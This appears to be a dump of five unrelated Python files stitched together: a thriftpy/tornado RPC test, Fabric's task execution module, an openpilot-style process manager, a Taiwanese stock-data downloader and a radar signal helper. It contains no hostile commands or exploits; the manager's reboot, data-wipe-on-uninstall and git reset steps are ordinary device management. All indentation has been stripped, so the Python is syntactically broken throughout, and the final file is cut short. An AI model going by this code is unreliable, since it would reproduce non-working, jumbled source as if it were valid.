# -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import socket
import threading
import time
from os import path
from unittest import TestCase
from tornado import ioloop
import thriftpy
from thriftpy.tornado import make_server
from thriftpy.rpc import make_client
from thriftpy.transport.framed import TFramedTransportFactory
from thriftpy.protocol.binary import TBinaryProtocolFactory
from thriftpy._compat import CYTHON
logging.basicConfig(level=logging.INFO)
addressbook = thriftpy.load(path.join(path.dirname(__file__),
"addressbook.thrift"))
class Dispatcher(object):
def __init__(self, io_loop):
self.io_loop = io_loop
self.registry = {}
def add(self, person):
"""
bool add(1: Person person);
"""
if person.name in self.registry:
return False
self.registry[person.name] = person
return True
def get(self, name):
"""
Person get(1: string name)
"""
if name not in self.registry:
raise addressbook.PersonNotExistsError()
return self.registry[name]
class FramedTransportTestCase(TestCase):
TRANSPORT_FACTORY = TFramedTransportFactory()
PROTOCOL_FACTORY = TBinaryProtocolFactory()
def mk_server(self):
self.io_loop = ioloop.IOLoop()
server = make_server(addressbook.AddressBookService,
Dispatcher(self.io_loop), io_loop=self.io_loop)
self.server = server
sock = self.server_sock = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.setblocking(0)
self.port = sock.getsockname()[-1]
self.server_thread = threading.Thread(target=self.listen)
self.server_thread.setDaemon(True)
self.server_thread.start()
def listen(self):
self.server_sock.listen(128)
self.server.add_socket(self.server_sock)
self.io_loop.start()
def mk_client(self):
return make_client(addressbook.AddressBookService,
'127.0.0.1', self.port,
proto_factory=self.PROTOCOL_FACTORY,
trans_factory=self.TRANSPORT_FACTORY)
def setUp(self):
self.mk_server()
time.sleep(0.1)
self.client = self.mk_client()
def test_able_to_communicate(self):
dennis = addressbook.Person(name='Dennis Ritchie')
success = self.client.add(dennis)
assert success
success = self.client.add(dennis)
assert not success
def test_zero_length_string(self):
dennis = addressbook.Person(name='')
success = self.client.add(dennis)
assert success
success = self.client.get(name='')
assert success
if CYTHON:
from thriftpy.transport.framed import TCyFramedTransportFactory
from thriftpy.protocol.cybin import TCyBinaryProtocolFactory
class CyFramedTransportTestCase(FramedTransportTestCase):
PROTOCOL_FACTORY = TCyBinaryProtocolFactory()
TRANSPORT_FACTORY = TCyFramedTransportFactory()
|
tasks.py
|
import inspect
import six
import sys
import textwrap
from fabric import state
from fabric.utils import abort, warn, error
from fabric.network import to_dict, disconnect_all
from fabric.context_managers import settings
from fabric.job_queue import JobQueue
from fabric.task_utils import crawl, merge, parse_kwargs
from fabric.exceptions import NetworkError
if sys.version_info[:2] == (2, 5):
# Python 2.5 inspect.getargspec returns a tuple
# instead of ArgSpec namedtuple.
class ArgSpec(object):
def __init__(self, args, varargs, keywords, defaults):
self.args = args
self.varargs = varargs
self.keywords = keywords
self.defaults = defaults
self._tuple = (args, varargs, keywords, defaults)
def __getitem__(self, idx):
return self._tuple[idx]
def patched_get_argspec(func):
return ArgSpec(*inspect._getargspec(func))
inspect._getargspec = inspect.getargspec
inspect.getargspec = patched_get_argspec
def get_task_details(task):
details = [
textwrap.dedent(task.__doc__)
if task.__doc__
else 'No docstring provided']
argspec = inspect.getargspec(task)
default_args = [] if not argspec.defaults else argspec.defaults
num_default_args = len(default_args)
args_without_defaults = argspec.args[:len(argspec.args) - num_default_args]
args_with_defaults = argspec.args[-1 * num_default_args:]
details.append('Arguments: %s' % (
', '.join(
args_without_defaults + [
'%s=%r' % (arg, default)
for arg, default in zip(args_with_defaults, default_args)
])
))
return '\n'.join(details)
def _get_list(env):
def inner(key):
return env.get(key, [])
return inner
class Task(object):
"""
Abstract base class for objects wishing to be picked up as Fabric tasks.
Instances of subclasses will be treated as valid tasks when present in
fabfiles loaded by the :doc:`fab </usage/fab>` tool.
For details on how to implement and use `~fabric.tasks.Task` subclasses,
please see the usage documentation on :ref:`new-style tasks
<new-style-tasks>`.
"""
name = 'undefined'
use_task_objects = True
aliases = None
is_default = False
# TODO: make it so that this wraps other decorators as expected
def __init__(self, alias=None, aliases=None, default=False, name=None,
*args, **kwargs):
if alias is not None:
self.aliases = [alias, ]
if aliases is not None:
self.aliases = aliases
if name is not None:
self.name = name
self.is_default = default
def __details__(self):
return get_task_details(self.run)
def run(self):
raise NotImplementedError
def get_hosts_and_effective_roles(self, arg_hosts, arg_roles, arg_exclude_hosts, env=None):
"""
Return a tuple containing the host list the given task should be using
and the roles being used.
See :ref:`host-lists` for detailed documentation on how host lists are
set.
.. versionchanged:: 1.9
"""
env = env or {'hosts': [], 'roles': [], 'exclude_hosts': []}
roledefs = env.get('roledefs', {})
# Command line per-task takes precedence over anything else.
if arg_hosts or arg_roles:
return merge(arg_hosts, arg_roles, arg_exclude_hosts, roledefs), arg_roles
# Decorator-specific hosts/roles go next
func_hosts = getattr(self, 'hosts', [])
func_roles = getattr(self, 'roles', [])
if func_hosts or func_roles:
return merge(func_hosts, func_roles, arg_exclude_hosts, roledefs), func_roles
# Finally, the env is checked (which might contain globally set lists
# from the CLI or from module-level code). This will be the empty list
# if these have not been set -- which is fine, this method should
# return an empty list if no hosts have been set anywhere.
env_vars = list(map(_get_list(env), "hosts roles exclude_hosts".split()))
env_vars.append(roledefs)
return merge(*env_vars), env.get('roles', [])
def get_pool_size(self, hosts, default):
# Default parallel pool size (calculate per-task in case variables
# change)
default_pool_size = default or len(hosts)
# Allow per-task override
# Also cast to int in case somebody gave a string
from_task = getattr(self, 'pool_size', None)
pool_size = int(from_task or default_pool_size)
# But ensure it's never larger than the number of hosts
pool_size = min((pool_size, len(hosts)))
# Inform user of final pool size for this task
if state.output.debug:
print("Parallel tasks now using pool size of %d" % pool_size)
return pool_size
class WrappedCallableTask(Task):
"""
Wraps a given callable transparently, while marking it as a valid Task.
Generally used via `~fabric.decorators.task` and not directly.
.. seealso:: `~fabric.docs.unwrap_tasks`, `~fabric.decorators.task`
"""
def __init__(self, callable, *args, **kwargs):
super(WrappedCallableTask, self).__init__(*args, **kwargs)
self.wrapped = callable
# Don't use getattr() here -- we want to avoid touching self.name
# entirely so the superclass' value remains default.
if hasattr(callable, '__name__'):
if self.name == 'undefined':
self.__name__ = self.name = callable.__name__
else:
self.__name__ = self.name
if hasattr(callable, '__doc__'):
self.__doc__ = callable.__doc__
if hasattr(callable, '__module__'):
self.__module__ = callable.__module__
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
def run(self, *args, **kwargs):
return self.wrapped(*args, **kwargs)
def __getattr__(self, k):
return getattr(self.wrapped, k)
def __details__(self):
orig = self
while 'wrapped' in orig.__dict__:
orig = orig.__dict__.get('wrapped')
return get_task_details(orig)
def requires_parallel(task):
"""
Returns True if given ``task`` should be run in parallel mode.
Specifically:
* It's been explicitly marked with ``@parallel``, or:
* It's *not* been explicitly marked with ``@serial`` *and* the global
parallel option (``env.parallel``) is set to ``True``.
"""
return (
(state.env.parallel and not getattr(task, 'serial', False))
or getattr(task, 'parallel', False)
)
def _parallel_tasks(commands_to_run):
return any(map(
lambda x: requires_parallel(crawl(x[0], state.commands)),
commands_to_run
))
def _is_network_error_ignored():
return not state.env.use_exceptions_for['network'] and state.env.skip_bad_hosts
def _parallel_wrap(task, args, kwargs, queue, name, env):
# Wrap in another callable that:
# * expands the env it's given to ensure parallel, linewise, etc are
# all set correctly and explicitly
# * nukes the connection cache to prevent shared-access problems
# * knows how to send the tasks' return value back over a Queue
# * captures exceptions raised by the task
state.env.update(env)
try:
state.connections.clear()
queue.put({'name': name, 'result': task.run(*args, **kwargs)})
except BaseException as e: # We really do want to capture everything
# SystemExit implies use of abort(), which prints its own
# traceback, host info etc -- so we don't want to double up
# on that. For everything else, though, we need to make
# clear what host encountered the exception that will
# print.
if type(e) is not SystemExit:
if not (isinstance(e, NetworkError) and _is_network_error_ignored()):
sys.stderr.write("!!! Parallel execution exception under host %r:\n" % name)
queue.put({'name': name, 'result': e})
# Here, anything -- unexpected exceptions, or abort()
# driven SystemExits -- will bubble up and terminate the
# child process.
if not (isinstance(e, NetworkError) and _is_network_error_ignored()):
raise
def _execute(task, host, my_env, args, kwargs, jobs, queue, multiprocessing):
"""
Primary single-host work body of execute()
"""
# Log to stdout
if state.output.running and not hasattr(task, 'return_value'):
print("[%s] Executing task '%s'" % (host, my_env['command']))
# Create per-run env with connection settings
local_env = to_dict(host)
local_env.update(my_env)
# Set a few more env flags for parallelism
if queue is not None:
local_env.update({'parallel': True, 'linewise': True})
# Handle parallel execution
if queue is not None: # Since queue is only set for parallel
name = local_env['host_string']
# Stuff into Process wrapper
kwarg_dict = {
'task': task,
'args': args,
'kwargs': kwargs,
'queue': queue,
'name': name,
'env': local_env,
}
p = multiprocessing.Process(target=_parallel_wrap, kwargs=kwarg_dict)
# Name/id is host string
p.name = name
# Add to queue
jobs.append(p)
# Handle serial execution
else:
with settings(**local_env):
return task.run(*args, **kwargs)
def _is_task(task):
return isinstance(task, Task)
def execute(task, *args, **kwargs):
"""
Execute ``task`` (callable or name), honoring host/role decorators, etc.
``task`` may be an actual callable object, or it may be a registered task
name, which is used to look up a callable just as if the name had been
given on the command line (including :ref:`namespaced tasks <namespaces>`,
e.g. ``"deploy.migrate"``.
The task will then be executed once per host in its host list, which is
(again) assembled in the same manner as CLI-specified tasks: drawing from
:option:`-H`, :ref:`env.hosts <hosts>`, the `~fabric.decorators.hosts` or
`~fabric.decorators.roles` decorators, and so forth.
``host``, ``hosts``, ``role``, ``roles`` and ``exclude_hosts`` kwargs will
be stripped out of the final call, and used to set the task's host list, as
if they had been specified on the command line like e.g. ``fab
taskname:host=hostname``.
Any other arguments or keyword arguments will be passed verbatim into
``task`` (the function itself -- not the ``@task`` decorator wrapping your
function!) when it is called, so ``execute(mytask, 'arg1',
kwarg1='value')`` will (once per host) invoke ``mytask('arg1',
kwarg1='value')``.
:returns:
a dictionary mapping host strings to the given task's return value for
that host's execution run. For example, ``execute(foo, hosts=['a',
'b'])`` might return ``{'a': None, 'b': 'bar'}`` if ``foo`` returned
nothing on host `a` but returned ``'bar'`` on host `b`.
In situations where a task execution fails for a given host but overall
progress does not abort (such as when :ref:`env.skip_bad_hosts
<skip-bad-hosts>` is True) the return value for that host will be the
error object or message.
.. seealso::
:ref:`The execute usage docs <execute>`, for an expanded explanation
and some examples.
.. versionadded:: 1.3
.. versionchanged:: 1.4
Added the return value mapping; previously this function had no defined
return value.
"""
my_env = {'clean_revert': True}
results = {}
# Obtain task
is_callable = callable(task)
if not (is_callable or _is_task(task)):
# Assume string, set env.command to it
my_env['command'] = task
task = crawl(task, state.commands)
if task is None:
msg = "%r is not callable or a valid task name" % (my_env['command'],)
if state.env.get('skip_unknown_tasks', False):
warn(msg)
return
else:
abort(msg)
# Set env.command if we were given a real function or callable task obj
else:
dunder_name = getattr(task, '__name__', None)
my_env['command'] = getattr(task, 'name', dunder_name)
# Normalize to Task instance if we ended up with a regular callable
if not _is_task(task):
task = WrappedCallableTask(task)
# Filter out hosts/roles kwargs
new_kwargs, hosts, roles, exclude_hosts = parse_kwargs(kwargs)
# Set up host list
my_env['all_hosts'], my_env['effective_roles'] = task.get_hosts_and_effective_roles(hosts, roles,
exclude_hosts, state.env)
parallel = requires_parallel(task)
if parallel:
# Import multiprocessing if needed, erroring out usefully
# if it can't.
try:
import multiprocessing
except ImportError:
import traceback
tb = traceback.format_exc()
abort(tb + """
At least one task needs to be run in parallel, but the
multiprocessing module cannot be imported (see above
traceback.) Please make sure the module is installed
or that the above ImportError is fixed.""")
else:
multiprocessing = None
# Get pool size for this task
pool_size = task.get_pool_size(my_env['all_hosts'], state.env.pool_size)
# Set up job queue in case parallel is needed
queue = multiprocessing.Queue() if parallel else None
jobs = JobQueue(pool_size, queue)
if state.output.debug:
jobs._debug = True
# Call on host list
if my_env['all_hosts']:
# Attempt to cycle on hosts, skipping if needed
for host in my_env['all_hosts']:
try:
results[host] = _execute(
task, host, my_env, args, new_kwargs, jobs, queue,
multiprocessing
)
except NetworkError as e:
results[host] = e
# Backwards compat test re: whether to use an exception or
# abort
if not state.env.use_exceptions_for['network']:
func = warn if state.env.skip_bad_hosts else abort
error(e.message, func=func, exception=e.wrapped)
else:
raise
# If requested, clear out connections here and not just at the end.
if state.env.eagerly_disconnect:
disconnect_all()
# If running in parallel, block until job queue is emptied
if jobs:
err = "One or more hosts failed while executing task '%s'" % (
my_env['command']
)
jobs.close()
# Abort if any children did not exit cleanly (fail-fast).
# This prevents Fabric from continuing on to any other tasks.
# Otherwise, pull in results from the child run.
ran_jobs = jobs.run()
for name, d in six.iteritems(ran_jobs):
if d['exit_code'] != 0:
if isinstance(d['results'], NetworkError) and \
_is_network_error_ignored():
error(d['results'].message, func=warn, exception=d['results'].wrapped)
elif isinstance(d['results'], BaseException):
error(err, exception=d['results'])
else:
error(err)
results[name] = d['results']
# Or just run once for local-only
else:
with settings(**my_env):
results['<local-only>'] = task.run(*args, **new_kwargs)
# Return what we can from the inner task executions
return results
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
from common.op_params import opParams
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1020
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
kill_updated = opParams().get('update_behavior').lower().strip() == 'off' or os.path.exists('/data/no_ota_updates')
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
if __name__ == "__main__" and ANDROID:
from common.spinner import Spinner
from common.text_window import TextWindow
else:
from common.spinner import FakeSpinner as Spinner
from common.text_window import FakeTextWindow as TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", "-j8"], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"driverview": "selfdrive.monitoring.driverview",
"lanespeedd": "selfdrive.controls.lib.lane_speed",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
# 'updated',
'deleter',
]
if not kill_updated:
persistent_processes.append('updated')
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
'lanespeedd',
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
run_all = False
if (msg.thermal.started and "driverview" not in running) or run_all:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# this is ugly
if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1":
start_managed_process("driverview")
elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0":
kill_managed_process("driverview")
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "0"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start. Press Reset to pull and reset to origin!\n \n" + error
with TextWindow(error) as t:
exit_status = t.wait_for_exit()
if exit_status == 'reset':
for _ in range(2):
try:
subprocess.check_output(["git", "pull"], cwd=BASEDIR)
subprocess.check_output(["git", "reset", "--hard", "@{u}"], cwd=BASEDIR)
print('git reset successful!')
break
except subprocess.CalledProcessError as e:
# print(e.output)
if _ != 1:
print('git reset failed, trying again')
time.sleep(5) # wait 5 seconds and try again
time.sleep(1)
subprocess.check_output(["am", "start", "-a", "android.intent.action.REBOOT"])
raise
# manual exit because we are forked
sys.exit(0)
|
download_data.py
|
#!/Users/coha/.pyenv/shims/python
from grs import BestFourPoint
from grs import Stock
from grs import TWSENo
import threading
#from concurrent.futures import ThreadPoolExecutor
stock_no_list = TWSENo().all_stock_no
def WorkerJob(stock_index, days):
print('# index {}'.format(stock_index))
stock = Stock(stock_index, days)
#stock.out_putfile('data/{}.csv'.format(stock_index))
"""
with ThreadPoolExecutor(max_workers=10) as executor:
for i in sorted(stock_no_list):
if len(i) != 4:
continue
#stock = Stock(i, 12 * 30)
#stock = Stock(i, 3 * 1)
#stock.out_putfile('data/{}.csv'.format(i))
print(type(i))
a = executor.submit(WorkerJob, i, 3)
#threading.Thread(target = WorkerJob, args = (i, 3)).start()
print(a.result())
"""
for i in sorted(stock_no_list):
if len(i) != 4:
continue
print('[compute] adgroup {}'.format(i))
#stock = Stock(i, 12 * 30)
stock = Stock(i, 1)
stock.out_putfile('/Users/coha/git/time-series-predictor/data/{}.csv'.format(i))
|
phase_multi.py
|
import numpy as np
import mmwave.dsp as dsp
from mmwave.dataloader import DCA1000
import os
from FER.utils import parseConfigFile, arange_tx, get_label
from queue import Queue
import threading
from mmwave.dsp.utils import Window
# configure file
configFileName = 'C:/Users/Zber/Desktop/mmWave Configuration/profile_3d_aop_3s.cfg'
def arange_tx(signal, num_tx, vx_axis=2, axis=1):
"""Separate interleaved radar data from separate TX along a certain axis to account for TDM radars.
Args:
signal (ndarray): Received signal.
num_tx (int): Number of transmit antennas.
vx_axis (int): Axis in which to accumulate the separated data.
axis (int): Axis in which the data is interleaved.
Returns:
ndarray: Separated received data in the
"""
# Reorder the axes
reordering = np.arange(len(signal.shape))
reordering[0] = axis
reordering[axis] = 0
signal = signal.transpose(reordering)
out = np.concatenate([signal[i::num_tx, ...] for i in range(num_tx)], axis=vx_axis)
return out.transpose(reordering)
